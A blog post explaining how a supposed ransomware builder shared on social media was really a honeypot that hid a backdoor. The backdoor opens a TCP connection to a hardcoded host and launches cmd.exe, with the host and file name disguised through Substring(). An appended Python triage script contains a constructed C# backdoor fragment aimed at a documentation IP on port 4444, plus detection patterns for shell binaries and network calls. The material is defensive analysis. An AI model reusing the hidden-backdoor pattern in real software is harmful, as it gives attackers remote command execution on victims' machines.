How I hacked 100 hackers
… Or script kiddies I could say
“Boredom always precedes a period of great creativity” — Robert M. Pirsig
How it started
How it ended
Jinn Ransomware Builder on Social Media
What was “Jinn Ransomware” supposed to be?
A builder that was able to construct a fully customizable ransomware with the following features:
- C2 Callbacks
- Multi-language support (PowerShell/C#/Python)
- AES encryption & decryption
- No detection
What it is in reality
Jinn Ransomware Builder is actually a honeypot, but some of the features presented above are real.
Let’s add the missing words to the list:
1. C2 Callbacks — backdoored & hardcoded:
The TcpClient() call takes two arguments: the destination host and the port.
As you can observe, the host argument is built with the Substring() function, which extracts the IP address from a longer string.
Process _Tiger = new Process();
This line creates a new Process object, which is used to start a new process.
_Tiger.StartInfo.FileName = GetFileName();
Note this function; it is explained below.
The GetFileName() function builds the stager name using the same Substring() trick as in the TcpClient() call.
Result: CmD.eXE
Conclusion: the code opens a remote connection and starts a process with the “CmD.eXE” executable that is hosted on that server.
2. Multi-language support (PowerShell/C#/Python) — theoretical yes:
…But in practice, it is actually just a prompt
The user was supposed to create the configuration of the ransomware implant from the command line, by completing the C2 details, language of the implant (PowerShell, C#, Python), Persistence mode (None, Scheduled Task, New Account Creation), Password for Decryption and the list of file extensions to be encrypted.
In the end, the builder was supposed to generate two executables: one for encryption and one for decryption.
It was used to add more spice to the features list, don’t be mad please!
3. AES encryption & decryption — but the functions are not fully functional:
Those were added to the builder in order to:
- Make it look like a legit ransomware builder
- Hide the hardcoded backdoor in plain sight
In reality, a basic analysis of the source code, starting from the program’s main function, reveals that:
The first method called is me(), which is the backdoor connection.
Its definition is attached again below.
4. No detection — nothing to add here😏:
Lessons Learned
Always analyze the source code of exploit samples and hacking tools taken from the Internet:
- Check for IP addresses and ports
- Check for functions that open new connections
- Check for functions that attempt to run system commands
- Zero detections on VirusTotal does not mean a sample is benign
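As an added example (not part of the original post), here is a small Python triage script that applies the checks above to a constructed C# fragment modelled on the backdoor pattern described earlier: it flags IP literals, connection APIs, process-spawning calls and Substring() slicing, and then evaluates the Substring() calls against the literals in the file to recover the hidden host and executable name. The sample fragment, the documentation address 192.0.2.10 and the rule set are assumptions, not the builder's code.

```python
import re

# Constructed C# fragment (not the post's code), modelled on the backdoor pattern
# described above: the C2 host and the executable name are carved out of a longer
# string with Substring(), so a grep for an IP address or "cmd.exe" can miss them.
SAMPLE_CS = """\
string blob = "qq192.0.2.10ppCmD.eXEzz";
TcpClient _c = new TcpClient(blob.Substring(2, 10), 4444);
Process _Tiger = new Process();
_Tiger.StartInfo.FileName = blob.Substring(14, 7);
_Tiger.Start();
"""

# (name, pattern). Matched case-insensitively and without word boundaries around
# the literals, because "CmD.eXE" buried in a longer string is what we want to catch.
RULES = [
    ("ip-literal",     r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)"),
    ("network-api",    r"\b(?:TcpClient|Socket|WebClient|HttpClient|Invoke-WebRequest|socket\.connect)\b"),
    ("process-exec",   r"new Process\(|Process\.Start|Start-Process|subprocess\.|os\.system"),
    ("shell-binary",   r"cmd\.exe|powershell|/bin/sh"),
    ("string-slicing", r"\.Substring\(|\.substr\(|\[\d+:\d+\]"),
]

ASSIGN = re.compile(r'string\s+(\w+)\s*=\s*"([^"]*)"')
SLICE = re.compile(r"(\w+)\.Substring\((\d+)\s*,\s*(\d+)\)")


def scan_source(src):
    """Return [(line_no, rule_name, matched_text)] for every rule hit."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, pat in RULES:
            for m in re.finditer(pat, line, re.IGNORECASE):
                hits.append((no, name, m.group(0)))
    return hits


def resolve_slices(src):
    """Evaluate NAME.Substring(start, length) against string literals assigned in
    the same file, recovering what the obfuscated expression yields at runtime.
    Returns [(line_no, variable, recovered_value)]."""
    literals = dict(ASSIGN.findall(src))
    out = []
    for no, line in enumerate(src.splitlines(), 1):
        for var, start, length in SLICE.findall(line):
            if var in literals:
                s, n = int(start), int(length)
                out.append((no, var, literals[var][s:s + n]))
    return out
```

Run `scan_source(SAMPLE_CS)` and `resolve_slices(SAMPLE_CS)` to see the rule hits per line and the recovered values "192.0.2.10" and "CmD.eXE".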
Verify the quality of the Threat Intelligence that you are spreading on Social Media or to your clients
Legal disclaimer
The activities were done in a simulated environment. No illegal hacking attempts were performed and I strictly discourage any such actions.